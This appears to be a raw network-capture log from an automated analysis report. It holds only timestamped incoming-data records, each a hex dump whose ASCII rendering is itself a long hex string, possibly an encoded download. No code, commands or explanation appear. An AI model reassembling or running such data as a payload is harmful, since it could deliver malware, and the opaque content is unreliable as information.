                                                                                                                            2022-10-03 14:03:32 UTC2855INData Raw: 45 43 30 36 43 36 31 35 30 43 32 46 36 36 33 44 42 45 31 31 33 46 31 38 42 39 39 31 46 36 42 45 39 31 37 33 30 38 33 41 34 44 42 38 42 41 38 39 46 34 36 31 45 34 32 36 43 36 31 44 43 43 43 31 45 34 31 32 46 36 45 39 32 35 43 34 34 37 36 37 36 31 30 45 42 42 42 41 39 39 37 35 45 39 36 36 39 42 35 46 31 34 41 44 36 39 44 41 30 31 31 44 34 37 32 37 36 31 31 41 36 36 41 31 42 41 38 35 46 39 37 42 30 42 45 42 33 39 33 41 30 43 31 33 44 38 35 33 33 30 37 41 31 42 45 39 34 33 39 35 32 30 46 44 33 42 34 38 31 46 36 36 41 31 35 41 34 36 46 41 43 42 31 38 35 37 33 30 42 37 43 43 46 36 36 46 46 32 34 45 44 36 39 46 33 42 35 39 32 37 45 45 32 32 33 44 39 38 38 36 36 41 33 39 46 37 32 37 33 30 30 41 45 33 33 30 30 39 44 33 37 39 42 46 42 42 33 39 38 37 44 44 34 44 42
                                                                                                                            Data Ascii: EC06C6150C2F663DBE113F18B991F6BE9173083A4DB8BA89F461E426C61DCCC1E412F6E925C44767610EBBBA9975E9669B5F14AD69DA011D4727611A66A1BA85F97B0BEB393A0C13D853307A1BE9439520FD3B481F66A15A46FACB185730B7CCF66FF24ED69F3B5927EE223D98866A39F727300AE33009D379BFBB3987DD4DB
                                                                                                                            2022-10-03 14:03:32 UTC2871INData Raw: 46 43 44 43 37 31 30 42 46 30 32 42 43 37 41 44 43 30 36 46 31 44 33 42 38 30 44 46 33 39 45 45 41 30 36 35 43 36 37 31 31 37 46 30 37 42 43 37 33 44 42 34 43 43 33 38 45 45 30 33 46 45 45 43 44 38 34 39 43 42 38 30 45 33 34 31 39 41 33 42 45 39 42 42 38 30 43 37 41 35 45 46 43 31 35 44 46 41 30 30 44 31 41 46 41 35 33 46 30 43 44 45 31 37 38 38 46 45 32 38 46 44 35 31 45 30 41 38 46 34 37 44 33 34 38 35 44 33 39 46 30 30 34 45 34 42 37 46 30 41 33 38 33 44 46 44 31 39 45 30 38 43 46 34 45 37 41 30 45 39 30 31 43 32 42 41 34 42 37 46 30 31 37 38 35 41 46 41 38 42 33 34 46 35 44 32 35 46 41 36 41 39 39 37 46 45 32 41 34 44 42 44 46 34 44 37 36 38 45 41 41 35 42 46 34 31 44 33 32 44 46 44 34 44 45 30 46 32 46 34 42 37 38 31 41 42 44 33 30 46 45 30 44 43 33
                                                                                                                            Data Ascii: FCDC710BF02BC7ADC06F1D3B80DF39EEA065C67117F07BC73DB4CC38EE03FEECD849CB80E3419A3BE9BB80C7A5EFC15DFA00D1AFA53F0CDE1788FE28FD51E0A8F47D3485D39F004E4B7F0A383DFD19E08CF4E7A0E901C2BA4B7F01785AFA8B34F5D25FA6A997FE2A4DBDF4D768EAA5BF41D32DFD4DE0F2F4B781ABD30FE0DC3
                                                                                                                            2022-10-03 14:03:32 UTC2887INData Raw: 39 43 34 45 46 41 41 32 36 31 39 30 44 44 41 30 39 46 38 34 46 35 31 45 31 39 38 45 45 31 39 45 35 45 43 33 45 30 31 35 38 42 32 31 43 42 38 32 31 44 30 36 37 31 37 35 32 38 44 41 31 39 30 39 43 34 46 37 30 44 39 38 42 37 39 42 37 31 30 46 34 44 44 39 32 45 44 34 42 31 34 38 33 38 37 34 32 43 44 41 32 32 36 44 46 35 36 37 44 34 30 37 36 39 35 39 36 35 45 39 34 30 32 33 43 45 44 43 38 35 45 31 32 30 36 42 38 34 43 35 32 38 41 38 42 36 31 33 35 45 42 34 46 45 43 43 35 44 32 30 41 31 42 45 30 44 41 44 32 42 35 46 33 44 36 43 31 33 38 35 46 43 43 34 43 45 33 30 42 32 38 30 39 39 44 33 41 34 35 43 34 43 42 38 32 46 36 42 36 41 41 41 46 30 33 35 32 46 34 33 45 45 30 41 42 39 42 34 38 43 39 32 34 33 33 34 43 33 32 38 33 39 32 38 38 35 46 35 39 32 41 43 45 38 46
                                                                                                                            Data Ascii: 9C4EFAA26190DDA09F84F51E198EE19E5EC3E0158B21CB821D06717528DA1909C4F70D98B79B710F4DD92ED4B14838742CDA226DF567D407695965E94023CEDC85E1206B84C528A8B6135EB4FECC5D20A1BE0DAD2B5F3D6C1385FCC4CE30B28099D3A45C4CB82F6B6AAAF0352F43EE0AB9B48C924334C328392885F592ACE8F
                                                                                                                            2022-10-03 14:03:32 UTC2903INData Raw: 39 42 30 39 42 31 36 44 45 43 38 31 45 45 44 33 31 33 31 30 35 30 37 32 36 31 34 30 36 30 31 39 44 39 30 42 42 30 46 36 36 34 46 44 38 43 31 42 43 45 31 36 44 39 42 31 45 35 36 33 32 37 46 30 39 32 33 31 31 32 43 35 44 37 34 38 46 31 43 30 34 34 30 39 37 39 37 45 31 35 30 31 36 32 38 44 37 42 32 46 34 30 46 41 34 33 46 36 42 36 34 38 37 44 37 38 37 37 46 32 38 30 37 43 33 45 30 36 32 34 38 32 37 44 31 30 36 39 39 35 44 35 41 41 46 30 45 30 41 34 45 44 45 42 42 33 45 41 36 44 38 38 33 33 34 35 39 30 31 30 38 38 36 35 33 46 35 43 33 46 45 42 34 31 45 38 36 35 39 32 34 38 41 35 35 31 34 42 42 30 42 45 35 43 35 44 33 45 31 46 41 39 38 38 37 42 41 38 43 34 38 32 39 44 32 41 37 45 35 37 45 38 31 35 36 44 42 34 43 43 32 44 37 37 39 46 38 30 33 30 36 41 39 30 30
                                                                                                                            Data Ascii: 9B09B16DEC81EED31310507261406019D90BB0F664FD8C1BCE16D9B1E56327F0923112C5D748F1C04409797E1501628D7B2F40FA43F6B6487D7877F2807C3E0624827D106995D5AAF0E0A4EDEBB3EA6D883345901088653F5C3FEB41E8659248A5514BB0BE5C5D3E1FA9887BA8C4829D2A7E57E8156DB4CC2D779F80306A900
                                                                                                                            2022-10-03 14:03:32 UTC2919INData Raw: 33 43 30 43 39 30 34 45 31 35 41 38 45 36 34 34 37 41 37 45 35 38 30 37 33 46 43 37 30 45 30 44 33 45 37 41 44 45 46 30 46 46 44 37 39 41 31 42 45 30 44 46 35 31 46 38 39 46 35 44 37 38 41 36 42 38 31 36 30 36 45 45 35 41 37 33 32 46 46 43 37 46 32 44 30 43 44 43 42 35 42 30 38 32 31 36 43 34 44 35 41 30 31 44 46 36 39 45 45 30 46 46 38 46 39 39 43 43 39 30 33 46 36 39 43 44 31 30 34 45 44 39 36 35 45 39 34 33 42 33 46 33 35 33 33 32 31 39 31 45 42 31 34 34 33 39 39 45 43 32 46 45 44 33 34 45 43 37 39 37 45 34 39 39 39 38 37 45 35 38 45 31 44 30 33 34 46 34 41 30 45 38 36 41 34 35 35 36 34 42 38 30 37 43 36 45 34 38 34 36 33 45 36 45 45 44 30 35 42 31 34 37 42 34 30 43 34 42 34 41 41 46 32 36 41 37 39 46 32 31 45 32 37 34 39 39 35 36 41 44 44 36 33 38 41
                                                                                                                            Data Ascii: 3C0C904E15A8E6447A7E58073FC70E0D3E7ADEF0FFD79A1BE0DF51F89F5D78A6B81606EE5A732FFC7F2D0CDCB5B08216C4D5A01DF69EE0FF8F99CC903F69CD104ED965E943B3F35332191EB144399EC2FED34EC797E499987E58E1D034F4A0E86A45564B807C6E48463E6EED05B147B40C4B4AAF26A79F21E2749956ADD638A
                                                                                                                            2022-10-03 14:03:32 UTC2935INData Raw: 43 32 46 46 36 37 45 39 46 46 42 44 46 30 45 46 31 36 46 38 43 35 44 36 39 44 30 32 45 38 43 44 33 34 39 38 33 37 38 31 43 42 39 35 37 39 32 33 45 30 46 46 30 46 31 42 33 33 31 39 41 36 46 46 39 34 31 30 43 38 38 38 35 42 35 39 36 30 36 41 38 35 35 41 46 42 41 34 33 44 42 35 42 31 45 38 44 32 38 44 34 32 39 31 42 39 39 37 42 31 33 31 41 44 45 38 33 43 45 36 46 36 43 30 42 46 42 42 38 44 31 39 42 42 31 41 43 32 35 34 43 33 46 33 30 36 44 33 33 30 46 45 41 44 37 36 36 36 45 34 36 41 43 39 34 42 38 35 42 44 34 43 45 45 37 37 45 31 43 30 46 33 42 42 35 32 34 37 37 33 45 33 44 35 34 36 46 35 35 39 46 39 38 45 39 44 43 35 31 36 35 36 43 38 31 34 45 39 36 39 33 33 32 37 34 37 35 43 39 35 33 43 43 43 30 43 35 43 34 44 31 30 44 34 34 35 33 33 39 37 35 46 39 44 31
                                                                                                                            Data Ascii: C2FF67E9FFBDF0EF16F8C5D69D02E8CD34983781CB957923E0FF0F1B3319A6FF9410C8885B59606A855AFBA43DB5B1E8D28D4291B997B131ADE83CE6F6C0BFBB8D19BB1AC254C3F306D330FEAD7666E46AC94B85BD4CEE77E1C0F3BB524773E3D546F559F98E9DC51656C814E9693327475C953CCC0C5C4D10D44533975F9D1
                                                                                                                            2022-10-03 14:03:32 UTC2951INData Raw: 44 38 35 41 34 36 33 36 42 45 35 44 32 39 38 43 32 41 39 32 46 34 30 45 30 46 46 44 45 33 33 44 31 34 30 38 37 34 38 43 43 42 34 42 32 42 43 39 33 42 45 31 42 37 34 39 31 41 31 45 33 35 34 38 30 41 34 41 41 42 41 45 30 46 35 37 46 32 46 44 45 35 41 39 46 32 44 41 34 46 46 31 32 43 38 32 43 44 38 36 35 31 46 38 30 39 46 34 31 36 37 38 38 31 44 34 30 32 30 34 33 45 42 32 46 36 38 33 31 32 38 35 42 44 34 44 43 42 45 41 42 42 39 30 36 34 34 46 31 45 43 46 39 36 37 46 34 33 39 35 31 44 35 39 42 46 31 45 30 46 45 46 35 30 30 35 43 41 30 44 33 33 43 34 43 43 35 38 45 44 38 42 41 32 38 38 37 30 45 36 31 35 35 36 31 34 35 33 42 41 39 43 43 34 36 43 44 38 30 31 43 33 33 42 38 41 35 33 41 39 33 46 41 46 32 41 36 44 34 35 45 32 38 39 42 32 37 33 33 38 36 33 36 46 37
                                                                                                                            Data Ascii: D85A4636BE5D298C2A92F40E0FFDE33D1408748CCB4B2BC93BE1B7491A1E35480A4AABAE0F57F2FDE5A9F2DA4FF12C82CD8651F809F4167881D402043EB2F6831285BD4DCBEABB90644F1ECF967F43951D59BF1E0FEF5005CA0D33C4CC58ED8BA28870E615561453BA9CC46CD801C33B8A53A93FAF2A6D45E289B27338636F7
                                                                                                                            2022-10-03 14:03:32 UTC2967INData Raw: 33 35 34 41 38 31 41 31 35 41 31 46 39 31 39 44 35 41 30 46 45 36 36 46 46 34 36 34 46 45 34 36 45 43 38 30 31 42 37 44 38 31 39 33 41 32 33 44 45 46 34 41 33 41 43 37 44 45 32 38 37 32 36 42 32 33 33 36 39 45 41 30 39 33 31 32 44 34 35 41 35 32 38 44 37 38 39 32 44 32 35 32 41 41 42 35 35 32 36 37 39 34 34 39 44 30 41 44 42 34 35 39 36 31 34 45 42 32 35 35 30 39 30 38 37 31 37 36 42 44 44 35 30 33 45 31 35 36 36 43 37 34 37 41 37 32 38 35 44 32 34 36 38 46 41 45 44 30 42 45 38 30 36 37 35 37 39 30 42 32 41 44 42 34 39 39 42 36 36 32 33 45 34 30 41 30 36 36 30 34 34 42 34 46 37 34 32 42 35 44 34 42 39 33 34 30 46 42 45 42 41 38 33 30 44 31 37 41 46 34 32 42 31 39 33 34 44 38 36 31 45 34 30 38 38 44 41 33 45 33 41 44 35 41 44 30 36 41 37 38 35 38 39 38 33
                                                                                                                            Data Ascii: 354A81A15A1F919D5A0FE66FF464FE46EC801B7D8193A23DEF4A3AC7DE28726B23369EA09312D45A528D7892D252AAB552679449D0ADB459614EB25509087176BDD503E1566C747A7285D2468FAED0BE80675790B2ADB499B6623E40A066044B4F742B5D4B9340FBEBA830D17AF42B1934D861E4088DA3E3AD5AD06A7858983
                                                                                                                            2022-10-03 14:03:32 UTC2983INData Raw: 43 39 46 37 35 46 33 41 31 46 44 31 41 45 44 37 36 45 45 42 45 39 43 32 45 46 34 36 45 34 34 34 33 44 33 45 33 37 36 44 35 30 44 38 42 30 36 44 41 33 32 45 30 46 45 38 31 35 33 42 41 45 45 32 45 43 44 33 39 44 39 36 46 43 33 32 41 41 46 33 31 35 46 42 45 35 42 41 34 46 39 45 38 43 37 38 37 30 45 37 30 32 45 33 42 37 44 41 41 35 33 44 34 46 37 35 46 41 42 43 32 31 37 39 43 45 45 30 41 46 36 35 36 35 41 36 36 45 34 33 32 37 36 39 34 43 38 46 30 46 35 44 42 43 46 30 45 30 32 46 46 43 38 34 35 42 38 31 41 46 42 37 39 38 39 32 31 44 39 46 45 34 37 33 41 37 34 42 41 37 39 34 39 46 39 37 44 38 41 45 42 34 44 44 33 43 37 31 35 42 31 30 46 46 45 45 45 41 32 43 44 37 38 45 32 46 36 45 38 46 34 42 41 44 45 39 42 30 36 36 43 31 45 36 42 44 30 46 34 46 35 34 31 39 32
                                                                                                                            Data Ascii: C9F75F3A1FD1AED76EEBE9C2EF46E4443D3E376D50D8B06DA32E0FE8153BAEE2ECD39D96FC32AAF315FBE5BA4F9E8C7870E702E3B7DAA53D4F75FABC2179CEE0AF6565A66E4327694C8F0F5DBCF0E02FFC845B81AFB798921D9FE473A74BA7949F97D8AEB4DD3C715B10FFEEEA2CD78E2F6E8F4BADE9B066C1E6BD0F4F54192
                                                                                                                            2022-10-03 14:03:32 UTC2999INData Raw: 38 37 41 46 34 43 38 39 37 42 37 38 30 46 31 30 37 37 46 37 44 37 45 36 42 32 42 41 34 42 38 39 45 44 38 46 46 37 30 30 39 38 44 42 37 38 38 32 43 45 44 44 44 44 42 43 43 32 36 33 42 34 45 30 30 37 38 43 35 44 44 31 42 36 45 33 31 46 44 36 38 35 36 31 43 31 30 30 43 42 39 39 31 41 30 44 45 31 41 34 32 32 38 37 34 34 32 32 31 45 42 34 32 38 42 33 45 33 35 44 37 31 32 31 44 39 31 34 32 37 31 33 42 41 39 31 33 35 32 32 38 44 38 33 36 46 31 35 35 38 38 44 36 46 35 44 31 41 39 30 35 39 32 30 33 41 42 35 38 33 38 30 30 35 35 36 42 38 32 31 39 42 31 43 41 43 32 45 34 37 30 37 45 43 43 30 30 43 39 43 46 32 31 33 37 36 44 44 43 38 43 33 39 35 42 35 44 45 34 46 34 31 30 44 34 33 45 46 35 45 37 41 33 45 38 46 46 38 36 42 44 35 37 34 43 35 43 32 30 44 33 36 36 39 32
                                                                                                                            Data Ascii: 87AF4C897B780F1077F7D7E6B2BA4B89ED8FF70098DB7882CEDDDDBCC263B4E0078C5DD1B6E31FD68561C100CB991A0DE1A4228744221EB428B3E35D7121D9142713BA9135228D836F15588D6F5D1A9059203AB583800556B8219B1CAC2E4707ECC00C9CF21376DDC8C395B5DE4F410D43EF5E7A3E8FF86BD574C5C20D36692
                                                                                                                            2022-10-03 14:03:32 UTC3015INData Raw: 46 37 33 41 45 39 38 30 37 44 42 39 36 41 41 33 37 44 42 43 39 43 43 36 38 30 34 38 30 36 43 43 33 38 46 33 38 35 33 44 44 41 36 36 43 46 42 46 38 33 33 36 36 45 35 44 46 32 36 38 32 34 32 35 36 37 34 32 41 37 36 31 38 38 45 30 32 45 34 37 39 33 38 39 35 39 36 33 37 42 37 32 46 38 44 45 30 36 34 31 38 30 43 41 41 30 42 38 38 46 32 43 45 43 37 45 32 43 42 45 30 45 37 35 32 39 31 35 35 31 38 46 33 39 33 36 38 43 44 37 41 34 32 36 42 39 41 43 41 30 38 45 42 30 39 44 36 45 32 34 43 43 36 33 31 32 33 33 36 36 44 34 42 37 42 30 31 42 37 38 31 34 30 39 38 44 38 35 42 46 38 31 39 34 39 37 31 44 39 46 34 37 41 43 35 46 41 41 31 33 36 38 32 41 44 44 41 30 36 37 31 41 44 36 32 45 45 33 32 41 37 36 42 35 41 38 41 31 44 46 46 32 32 31 33 37 46 31 36 43 37 34 38 31 30
                                                                                                                            Data Ascii: F73AE9807DB96AA37DBC9CC6804806CC38F3853DDA66CFBF83366E5DF26824256742A76188E02E47938959637B72F8DE064180CAA0B88F2CEC7E2CBE0E752915518F39368CD7A426B9ACA08EB09D6E24CC63123366D4B7B01B7814098D85BF8194971D9F47AC5FAA13682ADDA0671AD62EE32A76B5A8A1DFF22137F16C74810
                                                                                                                            2022-10-03 14:03:32 UTC3031INData Raw: 45 32 37 32 42 31 35 31 38 32 46 31 38 46 34 43 45 45 33 32 45 43 32 30 35 30 44 44 37 46 33 30 35 30 38 42 37 42 38 39 45 45 45 33 31 37 34 42 39 45 44 35 42 31 32 34 30 33 44 41 30 30 39 36 31 34 35 34 46 32 44 44 38 36 45 37 46 41 34 43 37 45 36 38 46 46 30 34 30 33 32 31 33 44 34 38 43 45 46 38 37 33 38 36 45 42 46 36 31 33 31 32 35 37 44 34 31 42 42 38 34 32 31 42 45 41 46 39 43 31 31 35 38 46 37 46 34 31 45 46 45 39 39 36 41 35 39 46 30 32 33 44 39 45 41 33 31 35 44 31 45 33 43 36 42 44 34 37 44 32 46 32 34 37 43 36 34 42 37 41 44 44 32 32 43 34 32 31 38 45 37 41 33 30 46 43 30 37 42 38 33 42 36 43 41 34 46 35 42 44 35 31 37 33 31 41 44 34 43 46 34 34 37 43 41 44 46 34 31 46 45 30 45 39 33 32 37 45 36 41 36 46 44 32 42 43 45 33 45 33 41 32 30 37 41
                                                                                                                            Data Ascii: E272B15182F18F4CEE32EC2050DD7F30508B7B89EEE3174B9ED5B12403DA00961454F2DD86E7FA4C7E68FF0403213D48CEF87386EBF6131257D41BB8421BEAF9C1158F7F41EFE996A59F023D9EA315D1E3C6BD47D2F247C64B7ADD22C4218E7A30FC07B83B6CA4F5BD51731AD4CF447CADF41FE0E9327E6A6FD2BCE3E3A207A
                                                                                                                            2022-10-03 14:03:32 UTC3047INData Raw: 39 34 35 39 46 33 30 41 42 32 42 46 36 30 35 32 37 36 45 44 36 38 33 35 37 39 31 30 36 30 31 38 35 41 31 46 42 46 36 31 37 30 39 42 39 33 46 43 30 38 44 32 41 31 46 39 32 43 34 45 44 35 38 44 37 46 36 30 37 45 35 32 42 35 45 37 39 33 30 42 42 34 32 36 31 41 36 37 36 43 41 37 37 41 38 33 33 45 37 37 30 37 43 46 35 38 34 31 39 45 34 45 35 37 41 41 38 31 33 31 31 30 37 41 46 42 33 42 35 38 37 46 42 46 45 44 36 46 36 41 43 32 39 32 32 36 46 37 41 45 30 30 32 30 38 45 30 41 33 34 45 43 34 36 31 38 38 41 42 35 46 38 34 39 33 42 38 39 38 38 37 38 37 32 46 43 33 35 45 45 46 42 44 36 31 38 41 32 46 30 44 36 33 32 36 39 35 36 42 36 33 35 35 42 35 35 39 31 34 30 45 37 46 37 45 45 34 42 46 39 32 43 30 44 44 44 46 33 44 30 35 36 33 32 35 42 30 35 45 33 39 44 44 34 31
                                                                                                                            Data Ascii: 9459F30AB2BF605276ED6835791060185A1FBF61709B93FC08D2A1F92C4ED58D7F607E52B5E7930BB4261A676CA77A833E7707CF58419E4E57AA8131107AFB3B587FBFED6F6AC29226F7AE00208E0A34EC46188AB5F8493B89887872FC35EEFBD618A2F0D6326956B6355B559140E7F7EE4BF92C0DDDF3D056325B05E39DD41
                                                                                                                            2022-10-03 14:03:32 UTC3063INData Raw: 33 32 43 39 38 31 31 38 42 35 32 35 31 45 42 37 36 44 34 38 43 36 43 45 44 38 39 38 36 31 39 36 46 38 43 34 41 45 30 46 32 33 36 31 46 36 42 34 30 43 36 44 37 36 37 35 32 44 39 41 42 42 30 36 44 34 33 44 45 42 43 39 43 35 43 36 41 45 44 43 36 33 31 42 41 44 34 30 38 32 43 36 38 42 45 32 31 45 36 34 34 39 42 45 46 30 36 37 32 39 35 43 39 37 39 42 33 39 35 43 34 46 43 31 34 43 35 33 37 45 34 32 31 44 36 34 45 39 36 44 43 44 38 34 37 35 42 45 30 43 44 44 44 39 33 38 39 45 44 35 32 46 43 30 45 32 42 34 35 30 44 32 37 37 43 44 38 43 44 31 45 37 37 43 34 35 44 35 43 35 45 37 33 46 35 43 31 39 44 34 30 42 34 37 44 33 32 33 39 36 33 46 45 31 41 35 32 34 45 42 42 30 36 41 38 46 39 34 33 44 44 45 38 32 43 46 36 46 43 45 30 44 32 36 37 30 35 46 31 34 45 41 36 31 35
                                                                                                                            Data Ascii: 32C98118B5251EB76D48C6CED8986196F8C4AE0F2361F6B40C6D76752D9ABB06D43DEBC9C5C6AEDC631BAD4082C68BE21E6449BEF067295C979B395C4FC14C537E421D64E96DCD8475BE0CDDD9389ED52FC0E2B450D277CD8CD1E77C45D5C5E73F5C19D40B47D323963FE1A524EBB06A8F943DDE82CF6FCE0D26705F14EA615
                                                                                                                            2022-10-03 14:03:32 UTC3079INData Raw: 36 44 36 36 30 33 36 36 41 44 39 45 31 36 33 42 31 36 36 31 42 46 39 37 31 36 30 42 32 34 43 34 36 41 45 38 30 35 37 46 44 31 46 42 39 34 38 44 41 33 34 42 42 41 44 31 44 46 44 41 32 46 30 45 32 34 46 43 37 39 31 46 31 33 35 39 35 42 44 42 42 31 33 30 35 42 43 44 37 34 39 39 42 30 41 42 36 42 45 46 31 44 31 38 30 45 37 39 38 41 39 46 32 46 43 39 37 30 41 35 38 43 30 39 34 37 35 31 34 33 34 46 32 46 42 34 34 43 44 30 45 43 44 36 37 35 33 35 43 30 30 41 42 37 33 35 43 39 32 33 43 37 41 38 34 39 36 46 30 33 38 39 31 46 37 46 32 45 34 32 42 41 42 39 39 42 35 30 46 39 31 31 32 37 32 42 31 33 45 44 38 39 38 30 37 41 36 44 30 42 34 31 44 34 43 37 31 33 44 31 42 35 43 45 33 30 42 30 45 33 35 31 41 37 37 44 45 36 45 37 34 33 42 43 43 35 37 30 39 46 39 37 33 31 34
                                                                                                                            Data Ascii: 6D660366AD9E163B1661BF97160B24C46AE8057FD1FB948DA34BBAD1DFDA2F0E24FC791F13595BDBB1305BCD7499B0AB6BEF1D180E798A9F2FC970A58C094751434F2FB44CD0ECD67535C00AB735C923C7A8496F03891F7F2E42BAB99B50F911272B13ED89807A6D0B41D4C713D1B5CE30B0E351A77DE6E743BCC5709F97314
                                                                                                                            2022-10-03 14:03:32 UTC3095INData Raw: 43 36 31 31 45 35 41 42 35 35 34 31 33 39 31 33 32 36 36 35 43 39 37 41 37 35 37 46 33 30 36 46 31 39 45 30 34 35 41 38 39 30 43 42 43 41 37 30 35 44 46 39 34 46 36 30 30 30 38 46 42 41 43 46 34 42 33 36 43 37 33 37 41 44 43 44 36 39 36 39 39 46 36 43 41 39 37 37 32 46 44 46 32 45 43 38 37 46 42 37 33 42 45 42 34 31 35 34 35 46 35 38 33 37 37 30 43 33 33 33 33 45 43 36 38 46 45 42 31 35 31 34 30 32 45 44 30 32 32 33 33 46 45 31 45 46 36 30 35 36 36 44 46 32 33 44 35 43 32 41 42 46 42 33 34 31 45 38 34 36 31 38 41 37 38 45 45 36 46 36 34 34 31 31 39 41 36 44 32 42 37 35 43 45 36 45 32 31 30 32 38 39 45 30 41 36 30 34 45 31 35 44 43 45 30 39 37 43 38 30 39 44 37 36 45 46 44 46 34 33 34 44 32 45 30 33 33 38 36 33 41 31 31 35 41 45 37 45 33 34 45 32 35 32 42
                                                                                                                            Data Ascii: C611E5AB554139132665C97A757F306F19E045A890CBCA705DF94F60008FBACF4B36C737ADCD69699F6CA9772FDF2EC87FB73BEB41545F583770C3333EC68FEB151402ED02233FE1EF60566DF23D5C2ABFB341E84618A78EE6F644119A6D2B75CE6E210289E0A604E15DCE097C809D76EFDF434D2E033863A115AE7E34E252B
                                                                                                                            2022-10-03 14:03:32 UTC3111INData Raw: 39 36 34 33 41 31 42 32 33 37 39 45 35 30 33 41 35 35 43 39 42 36 45 30 38 31 30 34 30 34 42 33 44 35 42 39 42 39 37 30 32 36 35 36 31 35 37 35 39 30 32 46 41 37 32 32 41 35 42 39 36 41 38 38 44 44 36 39 35 34 34 38 33 35 33 46 45 43 36 30 41 31 44 39 33 44 33 44 35 32 30 38 45 43 33 35 42 42 45 30 31 36 44 46 35 31 41 32 43 44 35 46 36 39 41 43 30 45 31 37 46 38 45 30 41 34 37 35 34 43 33 37 38 41 30 45 35 39 41 33 30 44 46 42 41 31 35 38 46 41 41 33 42 44 31 46 45 43 32 33 31 31 38 37 42 41 34 30 44 36 46 30 45 33 46 42 37 42 37 44 42 44 32 36 44 46 42 32 45 31 36 33 35 44 32 39 42 30 44 36 44 32 33 35 34 32 41 31 42 36 41 44 35 38 32 39 31 39 35 38 35 30 44 32 37 45 42 32 31 34 38 30 30 35 37 30 34 42 34 35 36 39 39 30 35 46 39 39 41 46 38 35 45 42 34
                                                                                                                            Data Ascii: 9643A1B2379E503A55C9B6E0810404B3D5B9B97026561575902FA722A5B96A88DD695448353FEC60A1D93D3D5208EC35BBE016DF51A2CD5F69AC0E17F8E0A4754C378A0E59A30DFBA158FAA3BD1FEC231187BA40D6F0E3FB7B7DBD26DFB2E1635D29B0D6D23542A1B6AD5829195850D27EB2148005704B4569905F99AF85EB4
                                                                                                                            2022-10-03 14:03:32 UTC3127INData Raw: 42 37 32 46 46 41 32 46 35 30 32 41 39 45 30 36 45 42 45 46 45 38 42 44 35 38 36 36 39 33 35 43 39 45 44 31 39 45 45 44 34 36 31 46 37 35 33 39 36 42 32 37 46 34 38 31 41 35 43 43 39 38 44 35 38 46 35 38 43 33 31 32 37 37 37 32 36 43 39 45 44 34 35 39 36 36 45 45 33 31 33 35 44 31 45 38 31 32 45 30 30 31 39 42 43 37 34 38 38 37 39 44 39 38 38 36 41 33 41 35 44 30 44 38 46 42 39 33 35 42 46 45 31 44 42 45 36 39 32 45 41 46 42 46 35 41 38 30 36 45 38 44 43 30 44 39 31 37 42 37 36 30 35 32 44 41 45 36 32 41 35 44 38 45 41 37 44 35 31 36 44 32 43 32 35 35 30 31 39 37 46 30 32 32 45 37 45 44 39 41 46 42 41 34 35 41 41 42 34 31 38 45 46 43 34 37 46 33 41 46 43 43 32 44 44 46 34 42 38 39 43 38 42 41 34 30 46 34 38 37 30 41 30 34 35 30 31 36 42 32 45 35 42 42 36
                                                                                                                            Data Ascii: B72FFA2F502A9E06EBEFE8BD5866935C9ED19EED461F75396B27F481A5CC98D58F58C31277726C9ED45966EE3135D1E812E0019BC748879D9886A3A5D0D8FB935BFE1DBE692EAFBF5A806E8DC0D917B76052DAE62A5D8EA7D516D2C2550197F022E7ED9AFBA45AAB418EFC47F3AFCC2DDF4B89C8BA40F4870A045016B2E5BB6
                                                                                                                            2022-10-03 14:03:32 UTC3143INData Raw: 33 32 30 44 44 30 37 42 33 43 38 43 33 31 35 31 46 39 46 44 30 44 45 43 35 30 43 45 36 44 41 45 33 43 35 37 30 46 30 37 33 38 34 38 34 46 34 42 39 43 39 35 33 46 31 30 45 36 31 42 39 41 38 33 36 39 41 36 31 38 38 36 45 39 38 45 46 35 44 43 44 41 37 39 44 37 43 38 42 44 37 34 34 35 45 32 34 31 35 41 30 46 44 39 45 34 45 38 36 31 38 33 44 45 46 46 38 43 31 44 41 31 36 37 41 41 41 35 36 38 31 44 33 34 38 30 34 33 46 37 43 30 30 45 39 46 32 39 41 37 44 44 30 42 33 32 36 37 45 42 37 31 36 34 33 41 44 35 44 31 30 30 39 43 45 37 33 39 34 41 44 39 38 45 34 35 46 39 41 43 37 46 45 34 32 42 36 42 30 31 43 38 37 37 43 37 34 35 36 31 37 42 35 42 41 39 39 30 44 38 43 46 39 41 31 38 31 39 42 42 31 37 42 38 44 41 46 30 43 31 41 42 37 37 44 32 37 35 34 37 44 32 33 36 35
                                                                                                                            Data Ascii: 320DD07B3C8C3151F9FD0DEC50CE6DAE3C570F0738484F4B9C953F10E61B9A8369A61886E98EF5DCDA79D7C8BD7445E2415A0FD9E4E86183DEFF8C1DA167AAA5681D348043F7C00E9F29A7DD0B3267EB71643AD5D1009CE7394AD98E45F9AC7FE42B6B01C877C745617B5BA990D8CF9A1819BB17B8DAF0C1AB77D27547D2365
                                                                                                                            2022-10-03 14:03:32 UTC3159INData Raw: 35 32 45 34 46 32 30 43 44 30 44 37 34 37 43 46 43 32 34 42 45 45 31 32 36 38 36 45 43 32 36 41 32 35 33 44 36 36 38 33 34 44 45 33 30 45 44 42 46 33 43 46 33 38 43 45 43 38 32 42 41 34 32 44 38 36 43 37 41 30 37 34 38 35 35 35 31 38 30 46 35 34 39 30 46 46 39 41 41 34 34 41 42 37 33 39 43 44 44 31 34 41 34 41 38 31 32 36 34 39 30 30 46 33 44 31 38 34 39 33 36 34 36 35 45 31 43 44 42 30 37 33 36 33 36 36 34 31 46 33 41 36 43 31 35 41 41 38 45 30 39 30 45 37 43 39 32 35 46 34 39 38 37 35 39 44 46 30 41 45 38 34 45 30 35 37 41 41 45 31 32 36 46 44 38 45 38 36 33 46 35 46 30 32 36 32 36 46 44 38 31 44 36 44 34 44 31 30 32 41 32 31 44 45 38 44 38 36 30 31 36 36 45 35 37 42 38 39 45 33 46 31 34 36 33 30 42 32 38 38 39 33 33 39 41 46 32 37 44 45 41 32 30 45 32
                                                                                                                            Data Ascii: 52E4F20CD0D747CFC24BEE12686EC26A253D66834DE30EDBF3CF38CEC82BA42D86C7A0748555180F5490FF9AA44AB739CDD14A4A81264900F3D184936465E1CDB073636641F3A6C15AA8E090E7C925F498759DF0AE84E057AAE126FD8E863F5F02626FD81D6D4D102A21DE8D860166E57B89E3F14630B2889339AF27DEA20E2
